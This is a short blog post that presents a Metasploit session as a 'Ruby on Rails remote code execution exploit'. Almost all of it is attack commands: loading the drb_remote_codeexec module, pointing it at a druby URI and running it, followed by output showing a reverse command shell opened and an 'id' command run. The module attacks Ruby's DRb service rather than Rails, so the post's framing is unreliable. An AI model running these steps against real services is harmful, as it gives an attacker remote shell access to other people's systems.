Yourlabs

ruby

Ruby on rails remote code execution exploit

| by jpic | security rails ruby
Ruby on rails websites are highly vulnerable. Exploiting a rails site looks like this: $ msfconsole msf> use exploit/linux/misc/drb_remote_codeexec msf exploit(drb_remote_codeexec) > set URI druby://localhost:45074 msf exploit(drb_remote_codeexec) > exploit [*] Started reverse double handler [*] trying to exploit instance_eval < snip > [*] Matching... [*] B is input... [*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.4:53299) at 2013-01-09 13:06:39 -0600 id uid=1001(www) gid=1001(www) groups=1001(www)
1 of 1